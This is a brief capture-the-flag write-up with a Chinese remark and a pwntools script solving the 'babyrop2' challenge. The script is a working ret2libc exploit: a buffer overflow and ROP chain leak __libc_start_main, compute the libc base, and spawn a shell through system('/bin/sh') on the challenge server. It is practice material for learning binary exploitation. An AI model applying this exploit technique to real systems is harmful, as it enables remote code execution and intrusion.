ret2libc。记一下因为这里的libc版本为libc6_2.27-3ubuntu1.2_amd64printf()的plt表地址结尾为f00,会产生截断,所以不能用printf()泄露。可以使用__libc_start_main

from pwn import *

elf = ELF('./babyrop2')

local = 0
if local == 1:
    io = process('./babyrop2')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',25717)
    libc  = ELF('libc.so.6')

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
libc_start_main = elf.got['__libc_start_main']

main_addr = 0x400636
rdi_ret = 0x0000000000400733
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr)
io.sendline(payload)
io.recvline()

libc_start_main_addr = u64(io.recv(6)+'\x00\x00')
libc_base = libc_start_main_addr - libc.symbols['__libc_start_main']
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr)
io.sendline(payload)

io.interactive()